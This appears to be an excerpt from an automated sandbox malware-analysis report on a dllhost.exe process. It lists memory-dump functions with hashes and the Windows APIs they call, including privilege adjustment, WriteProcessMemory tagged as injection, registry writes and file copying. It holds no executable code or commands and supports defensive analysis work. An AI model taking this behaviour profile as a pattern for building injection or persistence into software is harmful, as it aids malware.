Opcode ID: e0617799843237f76f26659d7671261444ce636d0cc18629660d2dbc35421b08
Instruction ID: e57354dde3fec212bf98a2b796b090a8f4e4701070449799e9b6f890f06359f7
Opcode Fuzzy Hash: e0617799843237f76f26659d7671261444ce636d0cc18629660d2dbc35421b08
Instruction Fuzzy Hash:

Function 0484F6D8 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b91acfbc7404960b0d31da2bd180ddc8589c291044a02a59c2a75c33cc8a4298
Instruction ID: 59550be9a9f2389136b791784b27d15fa304775db72fca1d2949a4ddc35cad81
Opcode Fuzzy Hash: b91acfbc7404960b0d31da2bd180ddc8589c291044a02a59c2a75c33cc8a4298
Instruction Fuzzy Hash:

Function 0484EEE0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4d351d00501ee3d35878ef24eedf8a1725bd57bfd5042cffa6928a5047e1728
Instruction ID: ca670f170af030b85590243eef9efe39b74c2088a5c87cbc0b9ac31a3127cb50
Opcode Fuzzy Hash: c4d351d00501ee3d35878ef24eedf8a1725bd57bfd5042cffa6928a5047e1728
Instruction Fuzzy Hash: 9690023144470DCB45542B997809995775CE944D267C10051A51D416115E66645047D9

Function 0484DE00 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 204e6d6fd3b700f07ff21c7eb58ddb27b0c2fc5bd2758f132dd1f58d81f457c2
Instruction ID: 09f0c0f6ef1e8526df579236d818bc5cab53b182e3117780226e643fc9fa55a0
Opcode Fuzzy Hash: 204e6d6fd3b700f07ff21c7eb58ddb27b0c2fc5bd2758f132dd1f58d81f457c2
Instruction Fuzzy Hash: 9A90023104460D8B464127997809555B75CA5549157804051A50D415125A75E9164699

Function 0484F278 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26e6c2c3726cc2adc6c3b2674b99f9d30428051c27966d0fe88650f09313fe12
Instruction ID: 844a8cb229d723e303f16230607c2fede162607209d8deae6ed5998e96f22626
Opcode Fuzzy Hash: 26e6c2c3726cc2adc6c3b2674b99f9d30428051c27966d0fe88650f09313fe12
Instruction Fuzzy Hash: D190023248460ECB458427997909555775CA9445157C00055A50D515125E556410469D

Analysis Process: dllhost.exePID: 4040, Parent PID: 660COMMON

Execution Graph

Execution Coverage:	13.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	69
Total number of Limit Nodes:	6

Executed Functions

Function 0082B32F Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0082B3AF

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 02f0daf3d52416d96829e1b5b65fb287553a1a1f695d0c21df888abc3e5bccca
Instruction ID: 1742c9a42350e0873c6701b72964d98b2296ab1deb988e77d19f0749a02ff4b9
Opcode Fuzzy Hash: 02f0daf3d52416d96829e1b5b65fb287553a1a1f695d0c21df888abc3e5bccca
Instruction Fuzzy Hash: D621AD755097809FDB22CF25DC44B52BFF4EF06310F08859AE985CB263D331A918CB62

Function 0082B4B1 Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0082B51D

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 653086a60f8cf3852d6303895c9fac61891d430bc6198dad05f6f89fc7675b38
Instruction ID: b58fb8f690372bf4b750a83c389dd04d59e4d7d027fe6ab2ac31fe43f9204b75
Opcode Fuzzy Hash: 653086a60f8cf3852d6303895c9fac61891d430bc6198dad05f6f89fc7675b38
Instruction Fuzzy Hash: 731190724093C09FDB228F15DC45A52FFB4FF16324F0980DAE9848F263D265A918CB62

Function 0082B366 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0082B3AF

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 4d31b6ce5b0852d90001b65720454825a9b3c8a1bdae171e2eea73936ff1b5e2
Instruction ID: 9af892756cfb8207f8a1ef57aba9f0db11c4f3f9bfea9f1872f923575e8d6f4f
Opcode Fuzzy Hash: 4d31b6ce5b0852d90001b65720454825a9b3c8a1bdae171e2eea73936ff1b5e2
Instruction Fuzzy Hash: 43119E315056049FEB20CF55E888B56FBE4FF04320F0888AAED45CB662D332E854DB61

Function 0082B4E2 Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0082B51D

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 6daa1ce7dc9dcfcc1eb06035cd5df5632e768da23df23c5ab1bf661b4279f646
Instruction ID: ee33adba6f705f12e7ea097cd9fbda82b48b523ef20c3b9eebf86089ab10412d
Opcode Fuzzy Hash: 6daa1ce7dc9dcfcc1eb06035cd5df5632e768da23df23c5ab1bf661b4279f646
Instruction Fuzzy Hash: 6801A2754052449FEB218F15E985B61FBE0FF14724F08C49AEE494F262C376A858DFA2

Function 00990080 Relevance: 2.6, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

dS|l, xrefs: 009901B9
:@Ul, xrefs: 00990100

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$dS|l
API String ID: 0-1394735054
Opcode ID: 00491a4d70ee88c9decc5c86d7e5e9fe2484aee74efff247c6c1eae1db125201
Instruction ID: 369104348baf84c7926f8a9b1d30de09f489ab774664901eb20b2b749c34dac0
Opcode Fuzzy Hash: 00491a4d70ee88c9decc5c86d7e5e9fe2484aee74efff247c6c1eae1db125201
Instruction Fuzzy Hash: 12318474900601DBE308EB7AFE42B56BBE2BFC4305F45C93DC5048B268EF7456958B52

Function 00990090 Relevance: 2.6, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

dS|l, xrefs: 009901B9
:@Ul, xrefs: 00990100

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$dS|l
API String ID: 0-1394735054
Opcode ID: 94c0705b5c2b37a4e1e7cae024d4b744c68ea77f728470b0b138db58d9525168
Instruction ID: b3445f97a6c72fe491eb4261784cdec3dce2574e58bee191f2c8689afc2588fb
Opcode Fuzzy Hash: 94c0705b5c2b37a4e1e7cae024d4b744c68ea77f728470b0b138db58d9525168
Instruction Fuzzy Hash: 50217534900601DBE308EB7AFE42756BBE2BFC8305F45C93DC5048B268EF7456958B92

Function 009D0A46 Relevance: 2.5, Strings: 2, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5, xrefs: 009D0A6C
E, xrefs: 009D0A49

Memory Dump Source

Source File: 0000002A.00000002.3334701072.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_9d0000_dllhost.jbxd

Similarity

API ID:
String ID: 5$E
API String ID: 0-717204176
Opcode ID: 64941d28881618cb0470ffba93560fb2050915152c38da6af071aea9f4bd0603
Instruction ID: 76b69f579e2e4d086fa20f71226ff291c2566683439e377e32217f85727d56e5
Opcode Fuzzy Hash: 64941d28881618cb0470ffba93560fb2050915152c38da6af071aea9f4bd0603
Instruction Fuzzy Hash: CED05E70806306CFCF418F70981929C3BB4FF91315B44860E90119E68ACA3C4625DB01

Function 009D0140 Relevance: 2.5, Strings: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

B, xrefs: 009D0144
/, xrefs: 009D065E

Memory Dump Source

Source File: 0000002A.00000002.3334701072.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_9d0000_dllhost.jbxd

Similarity

API ID:
String ID: /$B
API String ID: 0-2775194069
Opcode ID: 7f24855d8f1488049a6f7618e18fe3ac679a281dd7749788f7e261e4ae2cc7bb
Instruction ID: 0f5c666883d4f45a5efcfd2ad69b9df0e4d7180b11beb5c14e20758f55642cb4
Opcode Fuzzy Hash: 7f24855d8f1488049a6f7618e18fe3ac679a281dd7749788f7e261e4ae2cc7bb
Instruction Fuzzy Hash: C8D05B6490A3459BDF019F6089583687FB5AF91300F448996D14A5F3C7D93CC5009715

Function 0082A793 Relevance: 1.6, APIs: 1, Instructions: 98
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0082A849

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 48f7dbe386cbd88c0c7fe14bbf08db8dd7759e2c14e0f7f72321ad28eea49c15
Instruction ID: e256f012e008fca4fbad48b06ded16766d4558cbece3e7d9f155492a2b9a91f0
Opcode Fuzzy Hash: 48f7dbe386cbd88c0c7fe14bbf08db8dd7759e2c14e0f7f72321ad28eea49c15
Instruction Fuzzy Hash: B23192B5505380AFE722CF25DC45F62BFF8EF05314F08849AE9858B262D375A909CB72

Function 0082B62E Relevance: 1.6, APIs: 1, Instructions: 89
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0082B6D5

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: c0183ad7180505d1f681e48a764e39e4f124e96def0a5bea6c490afeb1b1c99d
Instruction ID: acf67c60f3fd636d3b906f59e61fdf95c0b59ae422b0d959de236e192436f2ff
Opcode Fuzzy Hash: c0183ad7180505d1f681e48a764e39e4f124e96def0a5bea6c490afeb1b1c99d
Instruction Fuzzy Hash: CA3191B55093806FE711CB65DC89B66FFF8EF06310F09849AE944CB293D375A909CB62

Function 0082A120 Relevance: 1.6, APIs: 1, Instructions: 86
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 0082A1C2

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 80f9f418178aa54a793fcfa355586a475da6527385ed964015eb1814751b4758
Instruction ID: b7448a1d394343da22bbc527793fef440ab527e5037ed03e80baca1d126900e9
Opcode Fuzzy Hash: 80f9f418178aa54a793fcfa355586a475da6527385ed964015eb1814751b4758
Instruction Fuzzy Hash: DF31827140D3C06FD3128B258C55BA6BFB4EF47620F1A45DBD884CF2A3D229691AC7B2

Function 0082AF4A Relevance: 1.6, APIs: 1, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,DB73329F,00000000,00000000,00000000,00000000), ref: 0082AFF0

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 0c42c4e649a9345f81a172b064da9c9d3f7ba963d1cbdeaba06dba1809debfad
Instruction ID: 63b91bf49efc0290c923bad520d7ccda525312a91cd8733edcc82047ce03d698
Opcode Fuzzy Hash: 0c42c4e649a9345f81a172b064da9c9d3f7ba963d1cbdeaba06dba1809debfad
Instruction Fuzzy Hash: DA2181B65097406FD722CF51DC44FA6BBF8EF06710F08849AE985CB192D324E948C762

Function 0082A8A0 Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,00000E24,DB73329F,00000000,00000000,00000000,00000000), ref: 0082A935

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 3d840c177f7b6c07a66013f25054408ad9adb6e240e5eebff84468870ac09c38
Instruction ID: 8bbf691641e888934c9eb6d51e9343a52b743766fbdbbaccb2eac9adcb6d0809
Opcode Fuzzy Hash: 3d840c177f7b6c07a66013f25054408ad9adb6e240e5eebff84468870ac09c38
Instruction Fuzzy Hash: DD210AB54097806FE7128B21DC45BB6BFBCEF47720F0980DAE9848B193D264AD49C772

Function 0082B046 Relevance: 1.6, APIs: 1, Instructions: 77
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegSetValueExW.KERNELBASE(?,00000E24,DB73329F,00000000,00000000,00000000,00000000), ref: 0082B0DC

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 1dbd3340cdb9d5982ec27215b474f0c798cc554d5d824d4cf254c243226f2f5e
Instruction ID: 3ed223092631e5e771f22e84d4534b66cd9593cce50338375c49e44ab0d8083f
Opcode Fuzzy Hash: 1dbd3340cdb9d5982ec27215b474f0c798cc554d5d824d4cf254c243226f2f5e
Instruction Fuzzy Hash: 752190B65097806FE7228B11DC45F67BFF8EF46710F08849AE985CB252D364E948CBB1

Function 0082A7CA Relevance: 1.6, APIs: 1, Instructions: 76
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0082A849

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7c8bd00526b14c94ad85a8e14a8353664f10118b727d9c84dadc66354bbec179
Instruction ID: 21a7817e79fa9a9507265ae42b40f1d8c7cbc09d41d36a5c9ae33c1f6787f568
Opcode Fuzzy Hash: 7c8bd00526b14c94ad85a8e14a8353664f10118b727d9c84dadc66354bbec179
Instruction Fuzzy Hash: BD21D175504200AFEB21CF25DC45B66FBE8FF08314F04886AE945CB251D371E805CB62

Function 0082AD1A Relevance: 1.6, APIs: 1, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDrives.KERNELBASE ref: 0082ADA1

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: e3af79917bc521d05d67b04851948c746d62f32652f5919056fd0235c319cf1d
Instruction ID: 7de31ee37c2ff445db731a5f3812ace845ace5e5ec3af858e0d8267901c38a1a
Opcode Fuzzy Hash: e3af79917bc521d05d67b04851948c746d62f32652f5919056fd0235c319cf1d
Instruction Fuzzy Hash: DC21487140E3C09FD7138B659C65A92BFB4EF07220F0A84DBD985CF1A3D2296849CB72

Function 0082B662 Relevance: 1.6, APIs: 1, Instructions: 72
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0082B6D5

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 99a2b47c1e079c74b40b2f5cdc8b71aefb76ee8d1aea658b10fdef3d76a40edc
Instruction ID: a6bd24ac5d9ab53ed18e643693c9acf0ee0f4b0b507904fe01f525c760b74e9f
Opcode Fuzzy Hash: 99a2b47c1e079c74b40b2f5cdc8b71aefb76ee8d1aea658b10fdef3d76a40edc
Instruction Fuzzy Hash: 4621CF75505240AFE720CF25DD89BA6FBE8EF14324F0884AAED44CB292D371E944CA72

Function 0082AA52 Relevance: 1.6, APIs: 1, Instructions: 70
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,00000E24,DB73329F,00000000,00000000,00000000,00000000), ref: 0082AAD1

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: bacd50ed0c0e120b1d2b8e03c000a12eb2495deaa4710b558783f8740a41c4ec
Instruction ID: 963f53eaa614afb1ae4c9abdbfa36c9863b84bcca591d3804a48b2bd0240cf5f
Opcode Fuzzy Hash: bacd50ed0c0e120b1d2b8e03c000a12eb2495deaa4710b558783f8740a41c4ec
Instruction Fuzzy Hash: 97219276409380AFE722CF51DC44F67BFB8EF45720F08849AE9459B152D275A508CBB2

Function 0082AF76 Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,DB73329F,00000000,00000000,00000000,00000000), ref: 0082AFF0

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: b5b11c157c0cbf9043678dbcbf36755cb3a00d8ce986b36324b116fa4ce980fb
Instruction ID: 1a51d04f03e07f27b2f7bcc0a85635258d67901ec96d414f0d03c0ccb7eb83ad
Opcode Fuzzy Hash: b5b11c157c0cbf9043678dbcbf36755cb3a00d8ce986b36324b116fa4ce980fb
Instruction Fuzzy Hash: D021AEB5500604AFE721CE15DD84F67F7ECEF04714F08845AEA45CB291D774E948CAB2

Function 0082A589 Relevance: 1.6, APIs: 1, Instructions: 67injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0082A608

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 400b06076a4238b666bcfa6709b2c79e016a5e2713d7fbaf1cb5916a6eefb240
Instruction ID: af95729b9c1134c59d8b093737dd297f0949d292bf5287969cf0abc1ff6231a6
Opcode Fuzzy Hash: 400b06076a4238b666bcfa6709b2c79e016a5e2713d7fbaf1cb5916a6eefb240
Instruction Fuzzy Hash: 2B218B754093C09FDB228F21DC44A52FFB4EF17310F0D84CBE9848B1A3D265A959DB62

Function 0082ADE8 Relevance: 1.6, APIs: 1, Instructions: 66fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,?,?), ref: 0082AE56

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 9b1db08e63f904cec2cc4dc5a0aeaa5a4082eaa95fc98862d55b88512256465f
Instruction ID: 12ac2717f4820ac17d13f3327d4f3f7c1657f9ba7c2fe65f32bb600eb7958302
Opcode Fuzzy Hash: 9b1db08e63f904cec2cc4dc5a0aeaa5a4082eaa95fc98862d55b88512256465f
Instruction Fuzzy Hash: 0B21A5755093805FD711CF65DC85B53BFE8EF06710F0984EAEC85CB262D224E858CB61

Function 0082B06A Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNELBASE(?,00000E24,DB73329F,00000000,00000000,00000000,00000000), ref: 0082B0DC

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 52806ec087c4986229bc6c4af290893f5a9e49acd1f3030c89d2d80e74d9d0dc
Instruction ID: 824950bdaf032f75cc4a04ab4e66204b73275fc0af2ba5c2d156ccb982533eb4
Opcode Fuzzy Hash: 52806ec087c4986229bc6c4af290893f5a9e49acd1f3030c89d2d80e74d9d0dc
Instruction Fuzzy Hash: 2411D0B6500600AFEB218E11DC85F67FBECEF04724F08845AEE45CB252D370E844CAB2

Function 0082B1C6 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0082B22E

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 9977bbdf41587bf581b2da50616bc13193b4c2f07c14bbca83f6899705fa12e5
Instruction ID: fcc614d9223c6de098cce0acd5e38f9eb4c24b3d969a2c8c0ef31e11858f51e4
Opcode Fuzzy Hash: 9977bbdf41587bf581b2da50616bc13193b4c2f07c14bbca83f6899705fa12e5
Instruction Fuzzy Hash: BC118EB2605380AFDB21CE25DC44B57BFE8EF55720F0884AAED49CB252D265E848CB61

Function 0082AA72 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000E24,DB73329F,00000000,00000000,00000000,00000000), ref: 0082AAD1

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 6ea1c561bf4c6df4c3cb517159c0bb890d97d6f5ab6b2c099b725035af8c1c7c
Instruction ID: 6b8d2171affb9f310345e74ed9f1885f1dd2cde4a83a759081ea7c441db8f569
Opcode Fuzzy Hash: 6ea1c561bf4c6df4c3cb517159c0bb890d97d6f5ab6b2c099b725035af8c1c7c
Instruction Fuzzy Hash: 56110175404304AFEB21CF51DD84FAAFBE8EF04724F08845AEE458B251C375A444CBB2

Function 0082A63B Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0082A6A8

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: e8f3813fbdbcaf1a0be4cf9ba3e7255f62a8835fd9dcf9191b940f8aa06bebb5
Instruction ID: 8855c936d243d82fb51b36754b3a17f1693a96e5e7cd48ca83a2b781edf5387a
Opcode Fuzzy Hash: e8f3813fbdbcaf1a0be4cf9ba3e7255f62a8835fd9dcf9191b940f8aa06bebb5
Instruction Fuzzy Hash: 2E11BE754097C05FDB128B21DC85A92BFB4EF07320F0984DADC888F163D224A949CB62

Function 0082AE0E Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,?,?), ref: 0082AE56

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 33ae76ee5884b28ac29385b09571894211e4b5e5aee4e5552c7acd7bdb9a4311
Instruction ID: c1f423d139b857549625dcd4ee73e3fba04ff6f8c2fdd7f741737984f379b6f7
Opcode Fuzzy Hash: 33ae76ee5884b28ac29385b09571894211e4b5e5aee4e5552c7acd7bdb9a4311
Instruction Fuzzy Hash: 0011A1756043409FEB64CF69EC85B56FBE8EF04724F0884AAED49CB252D335E854CA72

Function 0082B1E6 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0082B22E

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 33ae76ee5884b28ac29385b09571894211e4b5e5aee4e5552c7acd7bdb9a4311
Instruction ID: 17d85c822454b815a518e0a41b915ebf0e60ca731148fac750a755bf3cb6d51b
Opcode Fuzzy Hash: 33ae76ee5884b28ac29385b09571894211e4b5e5aee4e5552c7acd7bdb9a4311
Instruction Fuzzy Hash: F711E171605300DFEB20CF29EC85B5AFBE8EF04720F0884AAED09CB652D335E844CA61

Function 0082AC8C Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 0082ACE0

Memory Dump Source

Source File: 0000002A.00000002.3329631048.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_82a000_dllhost.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 484a6d641e587dcf4bfaf19336bd6aaa4718204073649a06c8fcc805006d2d9b
